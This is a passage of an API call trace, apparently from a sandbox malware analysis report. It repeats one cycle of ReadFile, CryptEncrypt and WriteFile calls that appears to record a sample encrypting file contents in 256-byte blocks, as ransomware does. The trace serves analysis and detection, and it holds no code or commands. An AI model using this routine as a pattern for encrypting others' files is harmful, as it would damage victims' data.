lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.595] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.595] GetLastError () returned 0x0 [0144.595] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.595] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.595] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.595] GetLastError () returned 0x0 [0144.595] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.595] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.595] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.595] GetLastError () returned 0x0 [0144.595] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.595] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.595] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.595] GetLastError () returned 0x0 [0144.595] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.595] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.595] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.595] GetLastError () returned 0x0 [0144.595] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.595] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.595] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.595] GetLastError () returned 0x0 [0144.595] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.595] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.595] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.595] GetLastError () returned 0x0 [0144.595] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.596] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.596] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.596] GetLastError () returned 0x0 [0144.596] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.596] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.596] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.596] GetLastError () returned 0x0 [0144.596] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.596] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.596] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.596] GetLastError () returned 0x0 [0144.596] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.596] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.596] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.596] GetLastError () returned 0x0 [0144.596] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.596] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.596] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.596] GetLastError () returned 0x0 [0144.596] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.596] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.596] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.596] GetLastError () returned 0x0 [0144.596] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.596] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.597] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.597] GetLastError () returned 0x0 [0144.597] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.597] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.597] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.597] GetLastError () returned 0x0 [0144.597] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.597] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.597] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.597] GetLastError () returned 0x0 [0144.597] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.597] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.597] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.597] GetLastError () returned 0x0 [0144.597] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.597] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.597] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.597] GetLastError () returned 0x0 [0144.597] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.597] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.597] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.597] GetLastError () returned 0x0 [0144.597] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.597] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.597] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.597] GetLastError () returned 0x0 [0144.597] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.598] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.598] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.598] GetLastError () returned 0x0 [0144.598] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.598] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.598] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.598] GetLastError () returned 0x0 [0144.598] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.598] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.598] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.598] GetLastError () returned 0x0 [0144.598] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.598] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.598] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.598] GetLastError () returned 0x0 [0144.598] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.598] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.598] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.598] GetLastError () returned 0x0 [0144.598] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.598] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.598] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.598] GetLastError () returned 0x0 [0144.598] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.598] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.599] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.599] GetLastError () returned 0x0 [0144.599] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.599] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.599] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.599] GetLastError () returned 0x0 [0144.599] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.599] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.599] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.599] GetLastError () returned 0x0 [0144.599] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.599] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.599] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.599] GetLastError () returned 0x0 [0144.599] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.599] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.599] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.599] GetLastError () returned 0x0 [0144.599] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.599] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.599] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.599] GetLastError () returned 0x0 [0144.599] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.599] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, 